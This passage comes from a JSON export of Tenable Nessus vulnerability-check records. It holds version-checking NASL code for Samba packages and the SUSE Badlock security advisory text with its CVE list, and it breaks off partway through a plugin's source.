) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-credentials0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-hostconfig-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-hostconfig0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-hostconfig0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-passdb-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-passdb0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-passdb0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-policy-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-policy0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-policy0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-util-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-util0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamba-util0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamdb-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamdb0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsamdb0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient-raw-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient-raw0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient-raw0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbclient0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbconf-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbconf0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbconf0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbldap-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbldap0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libsmbldap0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libtevent-util-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libtevent-util0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libtevent-util0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libwbclient-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libwbclient0-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libwbclient0-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-client-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-client-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-core-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-debugsource-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-libs-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-libs-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-pidl-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-python-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-python-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-test-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-test-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-test-devel-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-winbind-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"samba-winbind-debuginfo-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-atsvc0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-atsvc0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-binding0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc-samr0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libdcerpc0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libgensec0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libgensec0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-krb5pac0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-nbt0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-standard0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr-standard0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libndr0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libnetapi0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libnetapi0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libregistry0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libregistry0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-credentials0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-hostconfig0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-passdb0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-policy0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-util0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamba-util0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamdb0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsamdb0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbclient-raw0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbclient0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbclient0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbconf0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbconf0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbldap0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libsmbldap0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libtevent-util0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libtevent-util0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libwbclient0-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libwbclient0-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-client-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-client-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-libs-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-libs-debuginfo-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-winbind-32bit-4.2.4-34.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"samba-winbind-debuginfo-32bit-4.2.4-34.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"ctdb / ctdb-debuginfo / ctdb-devel / ctdb-pcp-pmda / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T14:23:48", "description": "Samba was updated to the 4.2.x codestream, bringing some new features\nand security fixes (bsc#973832, FATE#320709).\n\nThese security issues were fixed :\n\n - CVE-2015-5370: DCERPC server and client were vulnerable\n to DOS and MITM attacks (bsc#936862).\n\n - CVE-2016-2110: A man-in-the-middle could have downgraded\n NTLMSSP authentication (bsc#973031).\n\n - CVE-2016-2111: Domain controller netlogon member\n computer could have been spoofed (bsc#973032).\n\n - CVE-2016-2112: LDAP conenctions were vulnerable to\n downgrade and MITM attack (bsc#973033).\n\n - CVE-2016-2113: TLS certificate validation were missing\n (bsc#973034).\n\n - CVE-2016-2115: Named pipe IPC were vulnerable to MITM\n attacks (bsc#973036).\n\n - CVE-2016-2118: 'Badlock' DCERPC impersonation of\n authenticated account were possible (bsc#971965).\n\nAlso the following fixes were done :\n\n - Upgrade on-disk FSRVP server state to new version;\n (bsc#924519).\n\n - Fix samba.tests.messaging test and prevent potential tdb\n corruption by removing obsolete now invalid tdb_close\n call; (bsc#974629).\n\n - Align fsrvp feature sources with upstream version.\n\n - Obsolete libsmbsharemodes0 from samba-libs and\n libsmbsharemodes-devel from samba-core-devel;\n (bsc#973832).\n\n - s3:utils/smbget: Fix recursive download; (bso#6482).\n\n - s3: smbd: posix_acls: Fix check for setting u:g:o entry\n on a filesystem with no ACL support; (bso#10489).\n\n - docs: Add example for domain logins to smbspool man\n page; (bso#11643).\n\n - s3-client: Add a KRB5 wrapper for smbspool; (bso#11690).\n\n - loadparm: Fix memory leak issue; (bso#11708).\n\n - lib/tsocket: Work around sockets not supporting\n FIONREAD; (bso#11714).\n\n - ctdb-scripts: Drop use of 'smbcontrol winbindd\n ip-dropped ...'; (bso#11719).\n\n - s3:smbd:open: Skip redundant call to file_set_dosmode\n when creating a new file; (bso#11727).\n\n - param: Fix str_list_v3 to accept ';' again; (bso#11732).\n\n - Real memeory leak(buildup) issue in loadparm;\n (bso#11740).\n\n - Obsolete libsmbclient from libsmbclient0 and\n libpdb-devel from libsamba-passdb-devel while not\n providing it; (bsc#972197).\n\n - Getting and setting Windows ACLs on symlinks can change\n permissions on link\n\n - Only obsolete but do not provide gplv2/3 package names;\n (bsc#968973).\n\n - Enable clustering (CTDB) support; (bsc#966271).\n\n - s3: smbd: Fix timestamp rounding inside SMB2 create;\n (bso#11703); (bsc#964023).\n\n - vfs_fruit: Fix renaming directories with open files;\n (bso#11065).\n\n - Fix MacOS finder error 36 when copying folder to Samba;\n (bso#11347).\n\n - s3:smbd/oplock: Obey kernel oplock setting when\n releasing oplocks; (bso#11400).\n\n - Fix copying files with vfs_fruit when using\n vfs_streams_xattr without stream prefix and type suffix;\n (bso#11466).\n\n - s3:libsmb: Correctly initialize the list head when\n keeping a list of primary followed by DFS connections;\n (bso#11624).\n\n - Reduce the memory footprint of empty string options;\n (bso#11625).\n\n - lib/async_req: Do not install async_connect_send_test;\n (bso#11639).\n\n - docs: Fix typos in man vfs_gpfs; (bso#11641).\n\n - smbd: make 'hide dot files' option work with 'store dos\n attributes = yes'; (bso#11645).\n\n - smbcacls: Fix uninitialized variable; (bso#11682).\n\n - s3:smbd: Ignore initial allocation size for directory\n creation; (bso#11684).\n\n - Changing log level of two entries to from 1 to 3;\n (bso#9912).\n\n - vfs_gpfs: Re-enable share modes; (bso#11243).\n\n - wafsamba: Also build libraries with RELRO protection;\n (bso#11346).\n\n - ctdb: Strip trailing spaces from nodes file;\n (bso#11365).\n\n - s3-smbd: Fix old DOS client doing wildcard delete -\n gives a attribute type of zero; (bso#11452).\n\n - nss_wins: Do not run into use after free issues when we\n access memory allocated on the globals and the global\n being reinitialized; (bso#11563).\n\n - async_req: Fix non-blocking connect(); (bso#11564).\n\n - auth: gensec: Fix a memory leak; (bso#11565).\n\n - lib: util: Make non-critical message a warning;\n (bso#11566).\n\n - Fix winbindd crashes with samlogon for trusted domain\n user; (bso#11569); (bsc#949022).\n\n - smbd: Send SMB2 oplock breaks unencrypted; (bso#11570).\n\n - ctdb: Open the RO tracking db with perms 0600 instead of\n 0000; (bso#11577).\n\n - manpage: Correct small typo error; (bso#11584).\n\n - s3: smbd: If EA's are turned off on a share don't allow\n an SMB2 create containing them; (bso#11589).\n\n - Backport some valgrind fixes from upstream master;\n (bso#11597).\n\n - s3: smbd: have_file_open_below() fails to enumerate open\n files below an open directory handle; (bso#11615).\n\n - docs: Fix some typos in the idmap config section of man\n 5 smb.conf; (bso#11619).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 30, "cvss3": {"score": 7.5, "vector": "AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2016-04-15T00:00:00", "title": "SUSE SLED12 / SLES12 Security Update : samba (SUSE-SU-2016:1022-1) (Badlock)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-2112", "CVE-2016-2118", "CVE-2016-2110", "CVE-2016-2113", "CVE-2016-2115", "CVE-2015-5370", "CVE-2016-2111"], "modified": "2016-04-15T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libdcerpc-binding0", "p-cpe:/a:novell:suse_linux:libdcerpc0", "p-cpe:/a:novell:suse_linux:libdcerpc-binding0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0-debuginfo", "cpe:/o:novell:suse_linux:12", "p-cpe:/a:novell:suse_linux:libsamba-credentials0", "p-cpe:/a:novell:suse_linux:libndr-nbt0", "p-cpe:/a:novell:suse_linux:libndr0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-client-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient-raw0", "p-cpe:/a:novell:suse_linux:libwbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0", "p-cpe:/a:novell:suse_linux:libgensec0", "p-cpe:/a:novell:suse_linux:libndr-krb5pac0", "p-cpe:/a:novell:suse_linux:libsamdb0", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0", "p-cpe:/a:novell:suse_linux:libregistry0", "p-cpe:/a:novell:suse_linux:libtevent-util0", "p-cpe:/a:novell:suse_linux:libndr-standard0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-standard0", "p-cpe:/a:novell:suse_linux:libsmbclient0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debugsource", "p-cpe:/a:novell:suse_linux:libsmbclient-raw0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-debuginfo", "p-cpe:/a:novell:suse_linux:libndr0", "p-cpe:/a:novell:suse_linux:libsamdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbldap0", "p-cpe:/a:novell:suse_linux:samba", "p-cpe:/a:novell:suse_linux:libgensec0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-util0-debuginfo", "p-cpe:/a:novell:suse_linux:libndr-nbt0-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbclient0", "p-cpe:/a:novell:suse_linux:libsmbldap0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-winbind-debuginfo", "p-cpe:/a:novell:suse_linux:libsmbconf0-debuginfo", "p-cpe:/a:novell:suse_linux:libdcerpc0-debuginfo", "p-cpe:/a:novell:suse_linux:libwbclient0", "p-cpe:/a:novell:suse_linux:libsmbconf0", "p-cpe:/a:novell:suse_linux:samba-winbind", "p-cpe:/a:novell:suse_linux:libsamba-passdb0", "p-cpe:/a:novell:suse_linux:libsamba-passdb0-debuginfo", "p-cpe:/a:novell:suse_linux:libsamba-credentials0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-libs", "p-cpe:/a:novell:suse_linux:libsamba-hostconfig0-debuginfo", "p-cpe:/a:novell:suse_linux:libregistry0-debuginfo", "p-cpe:/a:novell:suse_linux:samba-client", "p-cpe:/a:novell:suse_linux:libsamba-util0", "p-cpe:/a:novell:suse_linux:samba-libs-debuginfo", "p-cpe:/a:novell:suse_linux:libnetapi0-debuginfo", "p-cpe:/a:novell:suse_linux:libtevent-util0-debuginfo"], "id": "SUSE_SU-2016-1022-1.NASL", "href": "https://www.tenable.com/plugins/nessus/90532", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2016:1022-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(90532);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2015-5370\", \"CVE-2016-2110\", \"CVE-2016-2111\", \"CVE-2016-2112\", \"CVE-2016-2113\", \"CVE-2016-2115\", \"CVE-2016-2118\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : samba (SUSE-SU-2016:1022-1) (Badlock)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Samba was updated to the 4.2.x codestream, bringing some new features\nand security fixes (bsc#973832, FATE#320709).\n\nThese security issues were fixed :\n\n - CVE-2015-5370: DCERPC server and client were vulnerable\n to DOS and MITM attacks (bsc#936862).\n\n - CVE-2016-2110: A man-in-the-middle could have downgraded\n NTLMSSP authentication (bsc#973031).\n\n - CVE-2016-2111: Domain controller netlogon member\n computer could have been spoofed (bsc#973032).\n\n - CVE-2016-2112: LDAP conenctions were vulnerable to\n downgrade and MITM attack (bsc#973033).\n\n - CVE-2016-2113: TLS certificate validation were missing\n (bsc#973034).\n\n - CVE-2016-2115: Named pipe IPC were vulnerable to MITM\n attacks (bsc#973036).\n\n - CVE-2016-2118: 'Badlock' DCERPC impersonation of\n authenticated account were possible (bsc#971965).\n\nAlso the following fixes were done :\n\n - Upgrade on-disk FSRVP server state to new version;\n (bsc#924519).\n\n - Fix samba.tests.messaging test and prevent potential tdb\n corruption by removing obsolete now invalid tdb_close\n call; (bsc#974629).\n\n - Align fsrvp feature sources with upstream version.\n\n - Obsolete libsmbsharemodes0 from samba-libs and\n libsmbsharemodes-devel from samba-core-devel;\n (bsc#973832).\n\n - s3:utils/smbget: Fix recursive download; (bso#6482).\n\n - s3: smbd: posix_acls: Fix check for setting u:g:o entry\n on a filesystem with no ACL support; (bso#10489).\n\n - docs: Add example for domain logins to smbspool man\n page; (bso#11643).\n\n - s3-client: Add a KRB5 wrapper for smbspool; (bso#11690).\n\n - loadparm: Fix memory leak issue; (bso#11708).\n\n - lib/tsocket: Work around sockets not supporting\n FIONREAD; (bso#11714).\n\n - ctdb-scripts: Drop use of 'smbcontrol winbindd\n ip-dropped ...'; (bso#11719).\n\n - s3:smbd:open: Skip redundant call to file_set_dosmode\n when creating a new file; (bso#11727).\n\n - param: Fix str_list_v3 to accept ';' again; (bso#11732).\n\n - Real memeory leak(buildup) issue in loadparm;\n (bso#11740).\n\n - Obsolete libsmbclient from libsmbclient0 and\n libpdb-devel from libsamba-passdb-devel while not\n providing it; (bsc#972197).\n\n - Getting and setting Windows ACLs on symlinks can change\n permissions on link\n\n - Only obsolete but do not provide gplv2/3 package names;\n (bsc#968973).\n\n - Enable clustering (CTDB) support; (bsc#966271).\n\n - s3: smbd: Fix timestamp rounding inside SMB2 create;\n (bso#11703); (bsc#964023).\n\n - vfs_fruit: Fix renaming directories with open files;\n (bso#11065).\n\n - Fix MacOS finder error 36 when copying folder to Samba;\n (bso#11347).\n\n - s3:smbd/oplock: Obey kernel oplock setting when\n releasing oplocks; (bso#11400).\n\n - Fix copying files with vfs_fruit when using\n vfs_streams_xattr without stream prefix and type suffix;\n (bso#11466).\n\n - s3:libsmb: Correctly initialize the list head when\n keeping a list of primary followed by DFS connections;\n (bso#11624).\n\n - Reduce the memory footprint of empty string options;\n (bso#11625).\n\n - lib/async_req: Do not install async_connect_send_test;\n (bso#11639).\n\n - docs: Fix typos in man vfs_gpfs; (bso#11641).\n\n - smbd: make 'hide dot files' option work with 'store dos\n attributes = yes'; (bso#11645).\n\n - smbcacls: Fix uninitialized variable; (bso#11682).\n\n - s3:smbd: Ignore initial allocation size for directory\n creation; (bso#11684).\n\n - Changing log level of two entries to from 1 to 3;\n (bso#9912).\n\n - vfs_gpfs: Re-enable share modes; (bso#11243).\n\n - wafsamba: Also build libraries with RELRO protection;\n (bso#11346).\n\n - ctdb: Strip trailing spaces from nodes file;\n (bso#11365).\n\n - s3-smbd: Fix old DOS client doing wildcard delete -\n gives a attribute type of zero; (bso#11452).\n\n - nss_wins: Do not run into use after free issues when we\n access memory allocated on the globals and the global\n being reinitialized; (bso#11563).\n\n - async_req: Fix non-blocking connect(); (bso#11564).\n\n - auth: gensec: Fix a memory leak; (bso#11565).\n\n - lib: util: Make non-critical message a warning;\n (bso#11566).\n\n - Fix winbindd crashes with samlogon for trusted domain\n user; (bso#11569); (bsc#949022).\n\n - smbd: Send SMB2 oplock breaks unencrypted; (bso#11570).\n\n - ctdb: Open the RO tracking db with perms 0600 instead of\n 0000; (bso#11577).\n\n - manpage: Correct small typo error; (bso#11584).\n\n - s3: smbd: If EA's are turned off on a share don't allow\n an SMB2 create containing them; (bso#11589).\n\n - Backport some valgrind fixes from upstream master;\n (bso#11597).\n\n - s3: smbd: have_file_open_below() fails to enumerate open\n files below an open directory handle; (bso#11615).\n\n - docs: Fix some typos in the idmap config section of man\n 5 smb.conf; (bso#11619).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=320709\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=913547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=919309\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=924519\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=936862\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=942716\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=946051\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=949022\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=964023\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=966271\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=968973\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=971965\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=972197\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973031\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973032\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973033\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=973034\"\n );\n script_set_attribute(\n 